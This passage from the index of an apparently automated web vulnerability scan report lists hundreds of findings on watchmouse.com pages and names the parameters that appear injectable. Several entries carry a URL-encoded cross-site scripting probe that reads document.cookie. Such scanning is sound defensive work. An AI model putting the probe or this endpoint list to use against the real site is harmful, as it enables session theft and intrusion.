1.343. http://www.watchmouse.com/assets/js/jquery-1.3.1.min.js [REST URL parameter 2]

1.344. http://www.watchmouse.com/assets/js/jquery-1.3.1.min.js [REST URL parameter 3]

1.345. http://www.watchmouse.com/assets/js/jquery-1.3.2.min.js [REST URL parameter 1]

1.346. http://www.watchmouse.com/assets/js/jquery-1.3.2.min.js [REST URL parameter 2]

1.347. http://www.watchmouse.com/assets/js/jquery-1.3.2.min.js [REST URL parameter 3]

1.348. http://www.watchmouse.com/assets/js/learn_more.js [REST URL parameter 1]

1.349. http://www.watchmouse.com/assets/js/learn_more.js [REST URL parameter 2]

1.350. http://www.watchmouse.com/assets/js/learn_more.js [REST URL parameter 3]

1.351. http://www.watchmouse.com/assets/js/ui/ui.core.js [REST URL parameter 1]

1.352. http://www.watchmouse.com/assets/js/ui/ui.core.js [REST URL parameter 2]

1.353. http://www.watchmouse.com/assets/js/ui/ui.core.js [REST URL parameter 3]

1.354. http://www.watchmouse.com/assets/js/ui/ui.core.js [REST URL parameter 4]

1.355. http://www.watchmouse.com/assets/js/ui/ui.dialog.js [REST URL parameter 1]

1.356. http://www.watchmouse.com/assets/js/ui/ui.dialog.js [REST URL parameter 2]

1.357. http://www.watchmouse.com/assets/js/ui/ui.dialog.js [REST URL parameter 3]

1.358. http://www.watchmouse.com/assets/js/ui/ui.dialog.js [REST URL parameter 4]

1.359. http://www.watchmouse.com/assets/js/ui/ui.draggable.js [REST URL parameter 1]

1.360. http://www.watchmouse.com/assets/js/ui/ui.draggable.js [REST URL parameter 2]

1.361. http://www.watchmouse.com/assets/js/ui/ui.draggable.js [REST URL parameter 3]

1.362. http://www.watchmouse.com/assets/js/ui/ui.draggable.js [REST URL parameter 4]

1.363. http://www.watchmouse.com/assets/js/wm.js [REST URL parameter 1]

1.364. http://www.watchmouse.com/assets/js/wm.js [REST URL parameter 2]

1.365. http://www.watchmouse.com/assets/js/wm.js [REST URL parameter 3]

1.366. http://www.watchmouse.com/assets/w3c/p3p.xml [REST URL parameter 1]

1.367. http://www.watchmouse.com/assets/w3c/p3p.xml [REST URL parameter 2]

1.368. http://www.watchmouse.com/assets/w3c/p3p.xml [REST URL parameter 3]

1.369. http://www.watchmouse.com/chat.php [REST URL parameter 1]

1.370. http://www.watchmouse.com/compare_plans.php [REST URL parameter 1]

1.371. http://www.watchmouse.com/compare_plans.php [name of an arbitrarily supplied request parameter]

1.372. http://www.watchmouse.com/de/ [3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 parameter]

1.373. http://www.watchmouse.com/de/ [REST URL parameter 1]

1.374. http://www.watchmouse.com/de/ [name of an arbitrarily supplied request parameter]

1.375. http://www.watchmouse.com/de/feature/public-status-page.html [REST URL parameter 1]

1.376. http://www.watchmouse.com/de/feature/public-status-page.html [REST URL parameter 2]

1.377. http://www.watchmouse.com/de/feature/public-status-page.html [REST URL parameter 3]

1.378. http://www.watchmouse.com/de/feature/the-watchmouse-api.html [REST URL parameter 1]

1.379. http://www.watchmouse.com/de/feature/the-watchmouse-api.html [REST URL parameter 2]

1.380. http://www.watchmouse.com/de/feature/the-watchmouse-api.html [REST URL parameter 3]

1.381. http://www.watchmouse.com/de/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 1]

1.382. http://www.watchmouse.com/de/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 2]

1.383. http://www.watchmouse.com/de/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 3]

1.384. http://www.watchmouse.com/de/feature/transaction-monitoring-web-application-testing.html [name of an arbitrarily supplied request parameter]

1.385. http://www.watchmouse.com/de/learn_more.php [REST URL parameter 1]

1.386. http://www.watchmouse.com/de/learn_more.php [REST URL parameter 2]

1.387. http://www.watchmouse.com/de/learn_more.php [name of an arbitrarily supplied request parameter]

1.388. http://www.watchmouse.com/de/plans_price.php [REST URL parameter 1]

1.389. http://www.watchmouse.com/de/plans_price.php [REST URL parameter 2]

1.390. http://www.watchmouse.com/de/plans_price.php [name of an arbitrarily supplied request parameter]

1.391. http://www.watchmouse.com/de/register.php [REST URL parameter 1]

1.392. http://www.watchmouse.com/de/register.php [REST URL parameter 2]

1.393. http://www.watchmouse.com/de/register.php [name of an arbitrarily supplied request parameter]

1.394. http://www.watchmouse.com/de/website_monitoring_features.php [REST URL parameter 1]

1.395. http://www.watchmouse.com/de/website_monitoring_features.php [REST URL parameter 2]

1.396. http://www.watchmouse.com/de/website_monitoring_features.php [name of an arbitrarily supplied request parameter]

1.397. http://www.watchmouse.com/en/ [3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 parameter]

1.398. http://www.watchmouse.com/en/ [REST URL parameter 1]

1.399. http://www.watchmouse.com/en/ [name of an arbitrarily supplied request parameter]

1.400. http://www.watchmouse.com/en/about.php [REST URL parameter 1]

1.401. http://www.watchmouse.com/en/about.php [REST URL parameter 2]

1.402. http://www.watchmouse.com/en/about.php [name of an arbitrarily supplied request parameter]

1.403. http://www.watchmouse.com/en/awards.php [REST URL parameter 1]

1.404. http://www.watchmouse.com/en/awards.php [REST URL parameter 2]

1.405. http://www.watchmouse.com/en/awards.php [name of an arbitrarily supplied request parameter]

1.406. http://www.watchmouse.com/en/chat.php [REST URL parameter 1]

1.407. http://www.watchmouse.com/en/chat.php [REST URL parameter 2]

1.408. http://www.watchmouse.com/en/checkit.php [REST URL parameter 1]

1.409. http://www.watchmouse.com/en/checkit.php [REST URL parameter 2]

1.410. http://www.watchmouse.com/en/checkit.php [name of an arbitrarily supplied request parameter]

1.411. http://www.watchmouse.com/en/compare_plans.php [REST URL parameter 1]

1.412. http://www.watchmouse.com/en/compare_plans.php [REST URL parameter 2]

1.413. http://www.watchmouse.com/en/compare_plans.php [name of an arbitrarily supplied request parameter]

1.414. http://www.watchmouse.com/en/compare_plans.php [vpackid parameter]

1.415. http://www.watchmouse.com/en/contact.php [REST URL parameter 1]

1.416. http://www.watchmouse.com/en/contact.php [REST URL parameter 2]

1.417. http://www.watchmouse.com/en/contact.php [name of an arbitrarily supplied request parameter]

1.418. http://www.watchmouse.com/en/current_partners.php [REST URL parameter 1]

1.419. http://www.watchmouse.com/en/current_partners.php [REST URL parameter 2]

1.420. http://www.watchmouse.com/en/current_partners.php [name of an arbitrarily supplied request parameter]

1.421. http://www.watchmouse.com/en/customers.php [REST URL parameter 1]

1.422. http://www.watchmouse.com/en/customers.php [REST URL parameter 2]

1.423. http://www.watchmouse.com/en/customers.php [name of an arbitrarily supplied request parameter]

1.424. http://www.watchmouse.com/en/dnstool.php [REST URL parameter 1]

1.425. http://www.watchmouse.com/en/dnstool.php [REST URL parameter 2]

1.426. http://www.watchmouse.com/en/dnstool.php [name of an arbitrarily supplied request parameter]

1.427. http://www.watchmouse.com/en/extensions.php [REST URL parameter 1]

1.428. http://www.watchmouse.com/en/extensions.php [REST URL parameter 2]

1.429. http://www.watchmouse.com/en/extensions.php [name of an arbitrarily supplied request parameter]

1.430. http://www.watchmouse.com/en/fact_sheet.php [REST URL parameter 1]

1.431. http://www.watchmouse.com/en/fact_sheet.php [REST URL parameter 2]

1.432. http://www.watchmouse.com/en/fact_sheet.php [name of an arbitrarily supplied request parameter]

1.433. http://www.watchmouse.com/en/faq.php [REST URL parameter 1]

1.434. http://www.watchmouse.com/en/faq.php [REST URL parameter 2]

1.435. http://www.watchmouse.com/en/faq.php [name of an arbitrarily supplied request parameter]

1.436. http://www.watchmouse.com/en/feature/api-and-web-services-cloud-monitoring.html [REST URL parameter 1]

1.437. http://www.watchmouse.com/en/feature/api-and-web-services-cloud-monitoring.html [REST URL parameter 2]

1.438. http://www.watchmouse.com/en/feature/api-and-web-services-cloud-monitoring.html [REST URL parameter 3]

1.439. http://www.watchmouse.com/en/feature/api-and-web-services-cloud-monitoring.html [name of an arbitrarily supplied request parameter]

1.440. http://www.watchmouse.com/en/feature/compare_plans.php [REST URL parameter 1]

1.441. http://www.watchmouse.com/en/feature/compare_plans.php [REST URL parameter 2]

1.442. http://www.watchmouse.com/en/feature/compare_plans.php [REST URL parameter 3]

1.443. http://www.watchmouse.com/en/feature/compare_plans.php [name of an arbitrarily supplied request parameter]

1.444. http://www.watchmouse.com/en/feature/ipv6-performance-monitoring.html [REST URL parameter 1]

1.445. http://www.watchmouse.com/en/feature/ipv6-performance-monitoring.html [REST URL parameter 2]

1.446. http://www.watchmouse.com/en/feature/ipv6-performance-monitoring.html [REST URL parameter 3]

1.447. http://www.watchmouse.com/en/feature/ipv6-performance-monitoring.html [name of an arbitrarily supplied request parameter]

1.448. http://www.watchmouse.com/en/feature/privacy.php [REST URL parameter 1]

1.449. http://www.watchmouse.com/en/feature/privacy.php [REST URL parameter 2]

1.450. http://www.watchmouse.com/en/feature/privacy.php [REST URL parameter 3]

1.451. http://www.watchmouse.com/en/feature/privacy.php [name of an arbitrarily supplied request parameter]

1.452. http://www.watchmouse.com/en/feature/public-status-page.html [REST URL parameter 1]

1.453. http://www.watchmouse.com/en/feature/public-status-page.html [REST URL parameter 2]

1.454. http://www.watchmouse.com/en/feature/public-status-page.html [REST URL parameter 3]

1.455. http://www.watchmouse.com/en/feature/public-status-page.html [name of an arbitrarily supplied request parameter]

1.456. http://www.watchmouse.com/en/feature/real-browser-monitoring.html [REST URL parameter 1]

1.457. http://www.watchmouse.com/en/feature/real-browser-monitoring.html [REST URL parameter 2]

1.458. http://www.watchmouse.com/en/feature/real-browser-monitoring.html [REST URL parameter 3]

1.459. http://www.watchmouse.com/en/feature/real-browser-monitoring.html [name of an arbitrarily supplied request parameter]

1.460. http://www.watchmouse.com/en/feature/root-cause-analysis.html [REST URL parameter 1]

1.461. http://www.watchmouse.com/en/feature/root-cause-analysis.html [REST URL parameter 2]

1.462. http://www.watchmouse.com/en/feature/root-cause-analysis.html [REST URL parameter 3]

1.463. http://www.watchmouse.com/en/feature/root-cause-analysis.html [name of an arbitrarily supplied request parameter]

1.464. http://www.watchmouse.com/en/feature/the-watchmouse-api.html [REST URL parameter 1]

1.465. http://www.watchmouse.com/en/feature/the-watchmouse-api.html [REST URL parameter 2]

1.466. http://www.watchmouse.com/en/feature/the-watchmouse-api.html [REST URL parameter 3]

1.467. http://www.watchmouse.com/en/feature/the-watchmouse-api.html [name of an arbitrarily supplied request parameter]

1.468. http://www.watchmouse.com/en/feature/tos.php [REST URL parameter 1]

1.469. http://www.watchmouse.com/en/feature/tos.php [REST URL parameter 2]

1.470. http://www.watchmouse.com/en/feature/tos.php [REST URL parameter 3]

1.471. http://www.watchmouse.com/en/feature/tos.php [name of an arbitrarily supplied request parameter]

1.472. http://www.watchmouse.com/en/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 1]

1.473. http://www.watchmouse.com/en/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 2]

1.474. http://www.watchmouse.com/en/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 3]

1.475. http://www.watchmouse.com/en/feature/transaction-monitoring-web-application-testing.html [name of an arbitrarily supplied request parameter]

1.476. http://www.watchmouse.com/en/feed.php [REST URL parameter 1]

1.477. http://www.watchmouse.com/en/feed.php [REST URL parameter 2]

1.478. http://www.watchmouse.com/en/feed.php [name of an arbitrarily supplied request parameter]

1.479. http://www.watchmouse.com/en/free_resources.php [REST URL parameter 1]

1.480. http://www.watchmouse.com/en/free_resources.php [REST URL parameter 2]

1.481. http://www.watchmouse.com/en/free_resources.php [name of an arbitrarily supplied request parameter]

1.482. http://www.watchmouse.com/en/howto.php [REST URL parameter 1]

1.483. http://www.watchmouse.com/en/howto.php [REST URL parameter 2]

1.484. http://www.watchmouse.com/en/howto.php [name of an arbitrarily supplied request parameter]

1.485. http://www.watchmouse.com/en/inthenews.php [REST URL parameter 1]

1.486. http://www.watchmouse.com/en/inthenews.php [REST URL parameter 2]

1.487. http://www.watchmouse.com/en/inthenews.php [name of an arbitrarily supplied request parameter]

1.488. http://www.watchmouse.com/en/learn_more.php [REST URL parameter 1]

1.489. http://www.watchmouse.com/en/learn_more.php [REST URL parameter 2]

1.490. http://www.watchmouse.com/en/learn_more.php [name of an arbitrarily supplied request parameter]

1.491. http://www.watchmouse.com/en/management.php [REST URL parameter 1]

1.492. http://www.watchmouse.com/en/management.php [REST URL parameter 2]

1.493. http://www.watchmouse.com/en/management.php [name of an arbitrarily supplied request parameter]

1.494. http://www.watchmouse.com/en/media_contact.php [REST URL parameter 1]

1.495. http://www.watchmouse.com/en/media_contact.php [REST URL parameter 2]

1.496. http://www.watchmouse.com/en/media_contact.php [name of an arbitrarily supplied request parameter]

1.497. http://www.watchmouse.com/en/my_subscription.php [REST URL parameter 1]

1.498. http://www.watchmouse.com/en/my_subscription.php [REST URL parameter 2]

1.499. http://www.watchmouse.com/en/my_subscription.php [name of an arbitrarily supplied request parameter]

1.500. http://www.watchmouse.com/en/my_subscription.php [vpackid parameter]

1.501. http://www.watchmouse.com/en/newsletters.php [REST URL parameter 1]

1.502. http://www.watchmouse.com/en/newsletters.php [REST URL parameter 2]

1.503. http://www.watchmouse.com/en/newsletters.php [name of an arbitrarily supplied request parameter]

1.504. http://www.watchmouse.com/en/non_profit_offering.php [REST URL parameter 1]

1.505. http://www.watchmouse.com/en/non_profit_offering.php [REST URL parameter 2]

1.506. http://www.watchmouse.com/en/non_profit_offering.php [name of an arbitrarily supplied request parameter]

1.507. http://www.watchmouse.com/en/our_promise.php [REST URL parameter 1]

1.508. http://www.watchmouse.com/en/our_promise.php [REST URL parameter 2]

1.509. http://www.watchmouse.com/en/our_promise.php [name of an arbitrarily supplied request parameter]

1.510. http://www.watchmouse.com/en/passwd.php [REST URL parameter 1]

1.511. http://www.watchmouse.com/en/passwd.php [REST URL parameter 2]

1.512. http://www.watchmouse.com/en/passwd.php [name of an arbitrarily supplied request parameter]

1.513. http://www.watchmouse.com/en/ping.php [REST URL parameter 1]

1.514. http://www.watchmouse.com/en/ping.php [REST URL parameter 2]

1.515. http://www.watchmouse.com/en/ping.php [name of an arbitrarily supplied request parameter]

1.516. http://www.watchmouse.com/en/plans_price.php [REST URL parameter 1]

1.517. http://www.watchmouse.com/en/plans_price.php [REST URL parameter 2]

1.518. http://www.watchmouse.com/en/plans_price.php [name of an arbitrarily supplied request parameter]

1.519. http://www.watchmouse.com/en/press.php [REST URL parameter 1]

1.520. http://www.watchmouse.com/en/press.php [REST URL parameter 2]

1.521. http://www.watchmouse.com/en/press.php [name of an arbitrarily supplied request parameter]

1.522. http://www.watchmouse.com/en/privacy.php [REST URL parameter 1]

1.523. http://www.watchmouse.com/en/privacy.php [REST URL parameter 2]

1.524. http://www.watchmouse.com/en/privacy.php [name of an arbitrarily supplied request parameter]

1.525. http://www.watchmouse.com/en/register.php [REST URL parameter 1]

1.526. http://www.watchmouse.com/en/register.php [REST URL parameter 2]

1.527. http://www.watchmouse.com/en/register.php [name of an arbitrarily supplied request parameter]

1.528. http://www.watchmouse.com/en/releases.php [REST URL parameter 1]

1.529. http://www.watchmouse.com/en/releases.php [REST URL parameter 2]

1.530. http://www.watchmouse.com/en/releases.php [name of an arbitrarily supplied request parameter]

1.531. http://www.watchmouse.com/en/resellers.php [REST URL parameter 1]

1.532. http://www.watchmouse.com/en/resellers.php [REST URL parameter 2]

1.533. http://www.watchmouse.com/en/resellers.php [name of an arbitrarily supplied request parameter]

1.534. http://www.watchmouse.com/en/scripting.php [REST URL parameter 1]

1.535. http://www.watchmouse.com/en/scripting.php [REST URL parameter 2]

1.536. http://www.watchmouse.com/en/search.php [REST URL parameter 1]

1.537. http://www.watchmouse.com/en/search.php [REST URL parameter 2]

1.538. http://www.watchmouse.com/en/search.php [name of an arbitrarily supplied request parameter]

1.539. http://www.watchmouse.com/en/seclog_demo.php [REST URL parameter 1]

1.540. http://www.watchmouse.com/en/seclog_demo.php [REST URL parameter 2]

1.541. http://www.watchmouse.com/en/seclog_demo.php [name of an arbitrarily supplied request parameter]

1.542. http://www.watchmouse.com/en/security_news.php [REST URL parameter 1]

1.543. http://www.watchmouse.com/en/security_news.php [REST URL parameter 2]

1.544. http://www.watchmouse.com/en/security_news.php [name of an arbitrarily supplied request parameter]

1.545. http://www.watchmouse.com/en/sitemap.php [REST URL parameter 1]

1.546. http://www.watchmouse.com/en/sitemap.php [REST URL parameter 2]

1.547. http://www.watchmouse.com/en/sitemap.php [name of an arbitrarily supplied request parameter]

1.548. http://www.watchmouse.com/en/terms.php [REST URL parameter 1]

1.549. http://www.watchmouse.com/en/terms.php [REST URL parameter 2]

1.550. http://www.watchmouse.com/en/terms.php [name of an arbitrarily supplied request parameter]

1.551. http://www.watchmouse.com/en/tos.php [REST URL parameter 1]

1.552. http://www.watchmouse.com/en/tos.php [REST URL parameter 2]

1.553. http://www.watchmouse.com/en/tos.php [name of an arbitrarily supplied request parameter]

1.554. http://www.watchmouse.com/en/traceroute.php [REST URL parameter 1]

1.555. http://www.watchmouse.com/en/traceroute.php [REST URL parameter 2]

1.556. http://www.watchmouse.com/en/traceroute.php [name of an arbitrarily supplied request parameter]

1.557. http://www.watchmouse.com/en/trial.php [REST URL parameter 1]

1.558. http://www.watchmouse.com/en/trial.php [REST URL parameter 2]

1.559. http://www.watchmouse.com/en/trial.php [name of an arbitrarily supplied request parameter]

1.560. http://www.watchmouse.com/en/website_monitoring_features.php [REST URL parameter 1]

1.561. http://www.watchmouse.com/en/website_monitoring_features.php [REST URL parameter 2]

1.562. http://www.watchmouse.com/en/website_monitoring_features.php [name of an arbitrarily supplied request parameter]

1.563. http://www.watchmouse.com/en/widget/dashboard_widget.php [REST URL parameter 1]

1.564. http://www.watchmouse.com/en/widget/dashboard_widget.php [REST URL parameter 2]

1.565. http://www.watchmouse.com/en/widget/dashboard_widget.php [REST URL parameter 3]

1.566. http://www.watchmouse.com/en/widget/dashboard_widget.php [name of an arbitrarily supplied request parameter]

1.567. http://www.watchmouse.com/en/windows/site_monitor.php [REST URL parameter 1]

1.568. http://www.watchmouse.com/en/windows/site_monitor.php [REST URL parameter 2]

1.569. http://www.watchmouse.com/en/windows/site_monitor.php [REST URL parameter 3]

1.570. http://www.watchmouse.com/en/windows/site_monitor.php [name of an arbitrarily supplied request parameter]

1.571. http://www.watchmouse.com/en/worldwide.php [REST URL parameter 1]

1.572. http://www.watchmouse.com/en/worldwide.php [REST URL parameter 2]

1.573. http://www.watchmouse.com/en/worldwide.php [name of an arbitrarily supplied request parameter]

1.574. http://www.watchmouse.com/es/ [3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 parameter]

1.575. http://www.watchmouse.com/es/ [REST URL parameter 1]

1.576. http://www.watchmouse.com/es/ [name of an arbitrarily supplied request parameter]

1.577. http://www.watchmouse.com/es/feature/public-status-page.html [REST URL parameter 1]

1.578. http://www.watchmouse.com/es/feature/public-status-page.html [REST URL parameter 2]

1.579. http://www.watchmouse.com/es/feature/public-status-page.html [REST URL parameter 3]

1.580. http://www.watchmouse.com/es/feature/the-watchmouse-api.html [REST URL parameter 1]

1.581. http://www.watchmouse.com/es/feature/the-watchmouse-api.html [REST URL parameter 2]

1.582. http://www.watchmouse.com/es/feature/the-watchmouse-api.html [REST URL parameter 3]

1.583. http://www.watchmouse.com/es/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 1]

1.584. http://www.watchmouse.com/es/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 2]

1.585. http://www.watchmouse.com/es/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 3]

1.586. http://www.watchmouse.com/es/feature/transaction-monitoring-web-application-testing.html [name of an arbitrarily supplied request parameter]

1.587. http://www.watchmouse.com/es/learn_more.php [REST URL parameter 1]

1.588. http://www.watchmouse.com/es/learn_more.php [REST URL parameter 2]

1.589. http://www.watchmouse.com/es/learn_more.php [name of an arbitrarily supplied request parameter]

1.590. http://www.watchmouse.com/es/plans_price.php [REST URL parameter 1]

1.591. http://www.watchmouse.com/es/plans_price.php [REST URL parameter 2]

1.592. http://www.watchmouse.com/es/plans_price.php [name of an arbitrarily supplied request parameter]

1.593. http://www.watchmouse.com/es/register.php [REST URL parameter 1]

1.594. http://www.watchmouse.com/es/register.php [REST URL parameter 2]

1.595. http://www.watchmouse.com/es/register.php [name of an arbitrarily supplied request parameter]

1.596. http://www.watchmouse.com/es/website_monitoring_features.php [REST URL parameter 1]

1.597. http://www.watchmouse.com/es/website_monitoring_features.php [REST URL parameter 2]

1.598. http://www.watchmouse.com/es/website_monitoring_features.php [name of an arbitrarily supplied request parameter]

1.599. http://www.watchmouse.com/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 1]

1.600. http://www.watchmouse.com/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 2]

1.601. http://www.watchmouse.com/feature/transaction-monitoring-web-application-testing.html [name of an arbitrarily supplied request parameter]

1.602. http://www.watchmouse.com/feed.php [REST URL parameter 1]

1.603. http://www.watchmouse.com/feed.php [name of an arbitrarily supplied request parameter]

1.604. http://www.watchmouse.com/fr/ [3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 parameter]

1.605. http://www.watchmouse.com/fr/ [REST URL parameter 1]

1.606. http://www.watchmouse.com/fr/ [name of an arbitrarily supplied request parameter]

1.607. http://www.watchmouse.com/fr/feature/public-status-page.html [REST URL parameter 1]

1.608. http://www.watchmouse.com/fr/feature/public-status-page.html [REST URL parameter 2]

1.609. http://www.watchmouse.com/fr/feature/public-status-page.html [REST URL parameter 3]

1.610. http://www.watchmouse.com/fr/feature/the-watchmouse-api.html [REST URL parameter 1]

1.611. http://www.watchmouse.com/fr/feature/the-watchmouse-api.html [REST URL parameter 2]

1.612. http://www.watchmouse.com/fr/feature/the-watchmouse-api.html [REST URL parameter 3]

1.613. http://www.watchmouse.com/fr/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 1]

1.614. http://www.watchmouse.com/fr/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 2]

1.615. http://www.watchmouse.com/fr/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 3]

1.616. http://www.watchmouse.com/fr/feature/transaction-monitoring-web-application-testing.html [name of an arbitrarily supplied request parameter]

1.617. http://www.watchmouse.com/fr/learn_more.php [REST URL parameter 1]

1.618. http://www.watchmouse.com/fr/learn_more.php [REST URL parameter 2]

1.619. http://www.watchmouse.com/fr/learn_more.php [name of an arbitrarily supplied request parameter]

1.620. http://www.watchmouse.com/fr/plans_price.php [REST URL parameter 1]

1.621. http://www.watchmouse.com/fr/plans_price.php [REST URL parameter 2]

1.622. http://www.watchmouse.com/fr/plans_price.php [name of an arbitrarily supplied request parameter]

1.623. http://www.watchmouse.com/fr/register.php [REST URL parameter 1]

1.624. http://www.watchmouse.com/fr/register.php [REST URL parameter 2]

1.625. http://www.watchmouse.com/fr/register.php [name of an arbitrarily supplied request parameter]

1.626. http://www.watchmouse.com/fr/website_monitoring_features.php [REST URL parameter 1]

1.627. http://www.watchmouse.com/fr/website_monitoring_features.php [REST URL parameter 2]

1.628. http://www.watchmouse.com/fr/website_monitoring_features.php [name of an arbitrarily supplied request parameter]

1.629. http://www.watchmouse.com/it/ [3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 parameter]

1.630. http://www.watchmouse.com/it/ [REST URL parameter 1]

1.631. http://www.watchmouse.com/it/ [name of an arbitrarily supplied request parameter]

1.632. http://www.watchmouse.com/it/feature/public-status-page.html [REST URL parameter 1]

1.633. http://www.watchmouse.com/it/feature/public-status-page.html [REST URL parameter 2]

1.634. http://www.watchmouse.com/it/feature/public-status-page.html [REST URL parameter 3]

1.635. http://www.watchmouse.com/it/feature/the-watchmouse-api.html [REST URL parameter 1]

1.636. http://www.watchmouse.com/it/feature/the-watchmouse-api.html [REST URL parameter 2]

1.637. http://www.watchmouse.com/it/feature/the-watchmouse-api.html [REST URL parameter 3]

1.638. http://www.watchmouse.com/it/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 1]

1.639. http://www.watchmouse.com/it/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 2]

1.640. http://www.watchmouse.com/it/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 3]

1.641. http://www.watchmouse.com/it/feature/transaction-monitoring-web-application-testing.html [name of an arbitrarily supplied request parameter]

1.642. http://www.watchmouse.com/it/learn_more.php [REST URL parameter 1]

1.643. http://www.watchmouse.com/it/learn_more.php [REST URL parameter 2]

1.644. http://www.watchmouse.com/it/learn_more.php [name of an arbitrarily supplied request parameter]

1.645. http://www.watchmouse.com/it/plans_price.php [REST URL parameter 1]

1.646. http://www.watchmouse.com/it/plans_price.php [REST URL parameter 2]

1.647. http://www.watchmouse.com/it/plans_price.php [name of an arbitrarily supplied request parameter]

1.648. http://www.watchmouse.com/it/register.php [REST URL parameter 1]

1.649. http://www.watchmouse.com/it/register.php [REST URL parameter 2]

1.650. http://www.watchmouse.com/it/register.php [name of an arbitrarily supplied request parameter]

1.651. http://www.watchmouse.com/it/website_monitoring_features.php [REST URL parameter 1]

1.652. http://www.watchmouse.com/it/website_monitoring_features.php [REST URL parameter 2]

1.653. http://www.watchmouse.com/it/website_monitoring_features.php [name of an arbitrarily supplied request parameter]

1.654. http://www.watchmouse.com/nl/ [3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 parameter]

1.655. http://www.watchmouse.com/nl/ [REST URL parameter 1]

1.656. http://www.watchmouse.com/nl/ [name of an arbitrarily supplied request parameter]

1.657. http://www.watchmouse.com/nl/feature/public-status-page.html [REST URL parameter 1]

1.658. http://www.watchmouse.com/nl/feature/public-status-page.html [REST URL parameter 2]

1.659. http://www.watchmouse.com/nl/feature/public-status-page.html [REST URL parameter 3]

1.660. http://www.watchmouse.com/nl/feature/the-watchmouse-api.html [REST URL parameter 1]

1.661. http://www.watchmouse.com/nl/feature/the-watchmouse-api.html [REST URL parameter 2]

1.662. http://www.watchmouse.com/nl/feature/the-watchmouse-api.html [REST URL parameter 3]

1.663. http://www.watchmouse.com/nl/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 1]

1.664. http://www.watchmouse.com/nl/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 2]

1.665. http://www.watchmouse.com/nl/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 3]

1.666. http://www.watchmouse.com/nl/feature/transaction-monitoring-web-application-testing.html [name of an arbitrarily supplied request parameter]

1.667. http://www.watchmouse.com/nl/learn_more.php [REST URL parameter 1]

1.668. http://www.watchmouse.com/nl/learn_more.php [REST URL parameter 2]

1.669. http://www.watchmouse.com/nl/learn_more.php [name of an arbitrarily supplied request parameter]

1.670. http://www.watchmouse.com/nl/plans_price.php [REST URL parameter 1]

1.671. http://www.watchmouse.com/nl/plans_price.php [REST URL parameter 2]

1.672. http://www.watchmouse.com/nl/plans_price.php [name of an arbitrarily supplied request parameter]

1.673. http://www.watchmouse.com/nl/register.php [REST URL parameter 1]

1.674. http://www.watchmouse.com/nl/register.php [REST URL parameter 2]

1.675. http://www.watchmouse.com/nl/register.php [name of an arbitrarily supplied request parameter]

1.676. http://www.watchmouse.com/nl/website_monitoring_features.php [REST URL parameter 1]

1.677. http://www.watchmouse.com/nl/website_monitoring_features.php [REST URL parameter 2]

1.678. http://www.watchmouse.com/nl/website_monitoring_features.php [name of an arbitrarily supplied request parameter]

1.679. http://www.watchmouse.com/passwd.php [REST URL parameter 1]

1.680. http://www.watchmouse.com/passwd.php [name of an arbitrarily supplied request parameter]

1.681. http://www.watchmouse.com/pl/ [3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 parameter]

1.682. http://www.watchmouse.com/pl/ [REST URL parameter 1]

1.683. http://www.watchmouse.com/pl/ [name of an arbitrarily supplied request parameter]

1.684. http://www.watchmouse.com/pl/feature/public-status-page.html [REST URL parameter 1]

1.685. http://www.watchmouse.com/pl/feature/public-status-page.html [REST URL parameter 2]

1.686. http://www.watchmouse.com/pl/feature/public-status-page.html [REST URL parameter 3]

1.687. http://www.watchmouse.com/pl/feature/public-status-page.html [name of an arbitrarily supplied request parameter]

1.688. http://www.watchmouse.com/pl/feature/the-watchmouse-api.html [REST URL parameter 1]

1.689. http://www.watchmouse.com/pl/feature/the-watchmouse-api.html [REST URL parameter 2]

1.690. http://www.watchmouse.com/pl/feature/the-watchmouse-api.html [REST URL parameter 3]

1.691. http://www.watchmouse.com/pl/feature/the-watchmouse-api.html [name of an arbitrarily supplied request parameter]

1.692. http://www.watchmouse.com/pl/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 1]

1.693. http://www.watchmouse.com/pl/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 2]

1.694. http://www.watchmouse.com/pl/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 3]

1.695. http://www.watchmouse.com/pl/feature/transaction-monitoring-web-application-testing.html [name of an arbitrarily supplied request parameter]

1.696. http://www.watchmouse.com/pl/learn_more.php [REST URL parameter 1]

1.697. http://www.watchmouse.com/pl/learn_more.php [REST URL parameter 2]

1.698. http://www.watchmouse.com/pl/learn_more.php [name of an arbitrarily supplied request parameter]

1.699. http://www.watchmouse.com/pl/plans_price.php [REST URL parameter 1]

1.700. http://www.watchmouse.com/pl/plans_price.php [REST URL parameter 2]

1.701. http://www.watchmouse.com/pl/plans_price.php [name of an arbitrarily supplied request parameter]

1.702. http://www.watchmouse.com/pl/register.php [REST URL parameter 1]

1.703. http://www.watchmouse.com/pl/register.php [REST URL parameter 2]

1.704. http://www.watchmouse.com/pl/register.php [name of an arbitrarily supplied request parameter]

1.705. http://www.watchmouse.com/pl/website_monitoring_features.php [REST URL parameter 1]

1.706. http://www.watchmouse.com/pl/website_monitoring_features.php [REST URL parameter 2]

